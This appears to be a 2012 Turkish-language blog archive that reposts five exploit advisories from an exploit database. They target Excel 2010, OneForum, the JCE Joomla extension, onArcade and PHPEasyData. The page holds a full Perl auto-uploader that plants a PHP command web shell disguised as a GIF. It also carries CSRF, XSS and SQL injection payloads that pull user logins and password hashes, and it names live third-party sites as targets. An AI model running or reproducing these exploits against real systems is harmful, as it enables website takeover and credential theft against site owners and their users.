Archive for 29 Ekim 2012

Microsoft Office Excel 2010 memory corruption

Microsoft Office Excel 2010 memory corruption dos poc

Title     :  Microsoft Office Excel 2010 memory corruption 
Version   :  Microsoft Office professional Plus 2010 
Date      :  2012-10-27 
Vendor    :  http://office.microsoft.com 
Impact    :  Med/High 
Contact   :  coolkaveh [at] rocketmail.com 
Twitter   :   
tested    :  XP SP3 ENG 
############################################################################### 
Bug : 
---- 
memory corruption during the handling of the xls files a context-dependent attacker  
can execute arbitrary code. 
----  
################################################################################ 
(b4c.1350): Access violation - code c0000005 (first chance) 
First chance exceptions are reported before any exception handling. 
This exception may be expected and handled. 
eax=00000584  
ebx=00135070  
ecx=00001000  
edx=0000105f  
esi=06a80800  
edi=00000040 
eip=301ce0d0  
esp=001302f0  
ebp=00131d6c iopl=0         nv up ei pl zr na pe nc 
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246 
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for Excel.exe -  
Excel!Ordinal40 0x1ce0d0: 
301ce0d0 668b5008        mov     dx,word ptr [eax 8]      ds:0023:0000058c=???? 
################################################################################ 

OneForum Multiple Vulnerabilities

OneForum scriptinde sql injection ve XSS açıkları bulundu. Açığa ilişkin açıklamalar şu şekilde;

########################################## 
# Exploit Title: OneForum Multiple Vulnerabilities 
# Date: 2012-10-29 
# Author: DaOne aka Mocking Bird 
# Home: 1337day Inj3ct0r Exploit Database  
# Software Link: http://www.onescripts.de/download/oneforum_en.zip 
# Category: webapps/php 
# Version: 2.0->3.0 
# Google dork: intext:"powered by OneScripts" 
########################################## 
 
[#] CSRF Change Admin Password: 
<html> 
<body> 
<form method="post" action="http://site/password.php?user_id=1" > 
<input name="password" type="text" value="passw0rd"> 
<input type="submit" name="submit" value="change password" > 
</form> 
</body> 
</html> 
 
[#] XSS 
http://localhost/category.php?id=<script>alert(0)</script> 
 
[#] SQL Injection: 
http://localhost/category.php?id=SQL 
Demo-> http://www.onescripts.de/demo/OneForum_en/category.php?id=2 UNION SELECT 1,user_pass,3 from users-- 
 
http://localhost/OneForum/topic.php?id= 

Joomla Component com_jce remote Code Injecion Execution Exploit

Joomla Component com_jce remote eklentisinde sql injection açığı bulundu.
Açık hakkındaki oluşum yerleri ve kullanımı şu şekilde.

#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 
#0     _                   __           __       __                     1 
#1   /' \            __  /'__`\        /\ \__  /'__`\                   0 
#0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 
#1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 
#0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 
#1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 
#0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 
#1                  \ \____/ >> Exploit database separated by exploit   0 
#0                   \/___/          type (local, remote, DoS, etc.)    1 
#1                                                                      1 
#0  [+] Site            : 1337day.com                                   0 
#1  [+] Support e-mail  : submit[at]1337day.com                         1 
#0                                                                      0 
#1               #########################################              1 
#0               I'm Caddy-dz member from Inj3ct0r Team                 1 
#1               #########################################              0 
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 
 
#### 
# Exploit Title: Joomla Component com_jce remote shell upload 
# Author: Caddy-Dz 
# Facebook Page: .Cyber.Army 
# E-mail:   
# Category:: webapps 
# Google Dork: inurl:index.php?option=com_jce 
# Security Risk: High 
# Tested on: Windows Seven Edition Integral / French 
#### 
# IMPORTANT : THIS IS A PRIV8T EXPLOIT , ALL RIGHTS RISERVED TO Mostafa Azizi . 
# 
# Greets : 1337day Team , Exploit-ID Team , Algerian Cyber Army Team , KedAns-Dz , Kalashincov3 
# .. Kha&mix , King Of Pirates , xDZx-Team ... and all algerian hackers . 
# 
# this was written for educational purpose only. use it at your own risk. 
# author will be not responsible for any damage caused! user assumes all responsibility  
# intended for authorized web application pentesting only! 
# 
 
 
use IO::Socket;  
use LWP::Simple;  
system("cls");  
if(!defined($ARGV[0])) {  
print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.\n\n";  
print "\t||||        Coded by: Mostafa Azizi (admin[@]0-Day[dot]net)      ||||\n\n";  
print "\t+--> Usage:   perl $0 <host>        <--+\n";  
print "\t+--> Example: perl $0 localhost     <--+\n\n";  
exit; }  
print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.\n\n";  
print "\t||||        Coded by: Mostafa Azizi (admin[@]0-Day[dot]net)      ||||\n\n";  
$TARGET = $ARGV[0];  
$PORT   = "80";  
$SCRIPT = "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20";  
$SHELL  = "/images/stories/0day.php?cmd=";  
$HTTP   = "http://";  
 
$header1G = "GET $SCRIPT HTTP/1.1";  
$header1H = "HEAD /images/stories/0day.php HTTP/1.1";  
$header1P = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1";  
$header1P2 = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1";  
$header2 = "Host: $TARGET";  
$header3 = "User-Agent: BOT/0.1 (BOT for JCE)";  
$header4 = "Content-Type: multipart/form-data; boundary=---------------------------41184676334";  
$header5 = "Content-Length: 769";  
$header6 = "-----------------------------41184676334";  
$header7 = 'Content-Disposition: form-data; name="upload-dir"';  
$header8 = '/';  
$header9 = 'Content-Disposition: form-data; name="Filedata"; filename=""';  
$header10 = 'Content-Type: application/octet-stream';  
$header11 = 'Content-Disposition: form-data; name="upload-overwrite"';  
$header12 = "0";  
$header13 = 'Content-Disposition: form-data; name="Filedata"; filename="0day.gif"';  
$header14 = 'Content-Type: image/gif';  
$header15 = 'GIF89aG';  
$header16 = "<? system($_REQUEST['cmd']);exit; ?>";  
$header17 = 'Content-Disposition: form-data; name="upload-name"';  
$header18 = '0day';  
$header19 = 'Content-Disposition: form-data; name="action"';  
$header20 = 'upload';  
$header21 = "-----------------------------41184676334--";  
$header22 = 'X-Request: JSON';  
$header23 = 'Content-Type: application/x-www-form-urlencoded; charset=utf-8';  
$header25 = 'json={"fn":"folderRename","args":["/0day.gif","0day.php"]}';  
$header24 = "Content-Length: ".length($header25)."";  
 
############################################### Packet 1 --> Checking Exploitability #########################################################  
print "\n[*] Checking Exploitability ...\n\n";  
sleep 2;  
$pageURL=$TARGET.$SCRIPT;  
$simplePage=get($pageURL);  
@arr = ("2.0.11</title","2.0.12</title","2.0.13</title","2.0.14</title","2.0.15</title","1.5.7.10</title","1.5.7.11</title","1.5.7.12</title","1.5.7.13</title","1.5.7.14</title"); 
while (($count!=10) && ($die != 1)) {  
foreach $arr{  
if ($simplePage =~ m/$arr/) {  
print "\n[*] Target patched.\n\n";  
$die = 1;  
} else {  
$count++;  
}  
}  
}  
if ($count==5) {print "[*] Target is exploitable.\n\n"};  
############################################### Packet 2 --> Uploading shell as a gif file #########################################################  
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET" ,PeerPort=>"$PORT")  
|| die "Can't connect to $TARGET";  
print "[*] Trying to upload 0day.gif ...\n\n";  
print $remote "$header1P\n$header2\n$header3\n$header4\n$header5\n\n$header6\n$header7\n\n$header8\n$header6\n$header9\n$header10\n\n\n$header6\n$header11\n\n$header12\n$header6\n$header13\n$header14\n\n$header15\n$header16\n$header6\n$header17\n\n$header18\n$header6\n$header19\n\n$header20\n$header21\n\n"; 
sleep 2;  
############################################### Packet 3 --> Change Extension from .gif to .php #########################################################  
print "[*] Trying to change extension from .gif to .php ...\n\n";  
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET" ,PeerPort=>"$PORT")  
|| die "Can't connect to $TARGET";  
print $remote "$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n";  
############################################### Packet 4 --> Check for successfully uploaded #########################################################  
$shellurl=$TARGET.$SHELL;  
$output=get($shellurl);  
while ($output = <$remote> ) {  
if ($output =~ /200 OK/) {  
print "[+] 0day.php was successfully uploaded\n\n";  
print "[+] Path:".$TARGET.$SHELL."id\n";  
}}  

onArcade v2.2 Blind SQL Vulnerability

onArcade v2.2 Blind SQL injection açığı bulunmuş olup, açık oluşumu ve kullanımı hakkında bilgiler şu şekilde;

/** 
*              onArcade v2.2 Blind SQL Vulnerability 
*              2.2 tested & Also All versions infacted 
*               Cold Zero <- [Cold z3ro] => www.hackteach.org 
*            27/10/2012 
*               http://up.support-ar.com/upload/files/onArcade%20v2.2.zip 
*               http://www.onarcade.com/ 
*/
 
 
1. [SQl]  
 
In forums.php the GET value of r ($_GET['r']) its only secured to be as a number, 
with function is_numeric($_GET['r']) check it http://php.net/manual/en/function.is-numeric.php 
then as we can use none exist number like 99999999999999 then exploit it 
 
 
error lines => 
 
 
case 'new_reply': 
// get topic or post information 
if (isset($_GET['t']) && is_numeric($_GET['t'])) 
$topic_sql = " 
SELECT 
t.topic_id, t.title AS topic_title, t.replies, t.locked, 
f.forum_id, f.title AS forum_title, f.reply_permission 
FROM 
". $tbl_prefix ."forums_topics AS t 
LEFT JOIN ". $tbl_prefix ."forums AS f ON (f.forum_id = t.forum_id) 
WHERE 
t.topic_id = ". (int) $_GET['t'] ."
LIMIT 1"; 
elseif (isset($_GET['r']) && is_numeric($_GET['r'])) 
$topic_sql = " 
SELECT 
r.title AS reply_title, r.message, 
t.topic_id, t.title AS topic_title, t.replies, t.locked, 
f.forum_id, f.title AS forum_title, f.reply_permission 
FROM 
". $tbl_prefix ."forums_replies AS r 
LEFT JOIN ". $tbl_prefix ."forums_topics AS t ON (r.topic_id = t.topic_id) 
LEFT JOIN ". $tbl_prefix ."forums AS f ON (f.forum_id = t.forum_id) 
WHERE 
r.reply_id = ". (int) $_GET['r'] ."
LIMIT 1"; 
else
no_page(); 
 
[EOF] 
 
 
 
Exploit: 
 
/forums.php?a=new_reply&r=[ Blind SQL ]  
 

PHPEasyData SQL Injection Vulnerability

PHPEasyData SQL Injection Açığı bulunmuş olup açığın oluşum yerleri ve exploit şu şekilde.

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 
0     _                   __           __       __                     1 
1   /' \            __  /'__`\        /\ \__  /'__`\                   0 
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 
1                  \ \____/ >> Exploit database separated by exploit   0 
0                   \/___/          type (local, remote, DoS, etc.)    1 
1                                                                      1 
0  [+] Site            : 1337day.com                                   0 
1  [+] Support e-mail  : submit[at]1337day.com                         1 
0                                                                      0 
1               #########################################              1 
0               I'm DaOne member from Inj3ct0r Team                    1 
1               #########################################              0 
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 
########################################## 
# Exploit Title: PHPEasyData SQL Injection Vulnerability 
# Date: 2012-10-28 
# Author: DaOne aka Mocking Bird 
# Home: 1337day Inj3ct0r Exploit Database  
# Software Link: http://phpeasydata.com/ 
# Category: webapps/php 
# Version: 2.5.1=>2.8.0 
########################################## 
 
# SQL Injection [POST Method] 
http://[host]/mailform.php  
Request Data(Error Based): annuaire=6&inf_id=5&message=3&myemail=&submit_add=Valider+les+modifications&titre=3&validation=1&enr_id=-1+and+(select 1 FROM(select+count(*),concat((select+concat(0x3a,user_login,0x3a,user_pass,0x3a) FROM an_users+LIMIT+0,1),floor(rand(0)*2))x FROM information_schema.tables+GROUP BY x)b) 
 
# Example: 
http://annuaire-discjockey.fr/annuaire/mailform.php 
http://www.macadi.fr/annonces/mailform.php 
http://www.gay-rhone-alpes.com/phpeasydata-pro-2.5.2/mailform.php 
 
 
----